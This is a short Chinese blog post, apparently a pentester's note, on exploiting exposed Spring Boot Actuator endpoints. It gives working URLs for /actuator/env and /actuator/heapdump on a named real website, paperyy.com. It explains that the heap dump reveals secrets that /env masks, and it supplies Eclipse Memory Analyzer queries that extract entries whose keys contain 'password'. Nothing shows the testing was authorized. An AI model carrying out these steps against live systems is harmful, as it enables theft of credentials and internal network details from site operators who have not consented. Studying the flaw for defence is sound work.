SpringBoot配置泄露

(Updated: )
渗透实战
,

相关知识

github

SpringBootVulExploit

博客

LandGrey’s Blog

具体利用

env

配置泄露路径:https://www.paperyy.com/actuator/env,里面有大量服务的内网地址、依赖jar信息。

image-20220723153027294

heapdump

访问 /env 接口时,spring actuator 会将一些带有敏感关键词(如 password、secret)的属性名对应的属性值用 * 号替换达到脱敏的效果,使用如下方法可以获得 * 号的内容。

访问https://www.paperyy.com/actuator/heapdump ,会下载heapdump文件,会比较大,下载后用 Eclipse Memory Analyzer 打开,使用下面的查询语句就可以查询到包含关键字的信息。

1
2
3
4
5
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))



select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

image-20220723153639174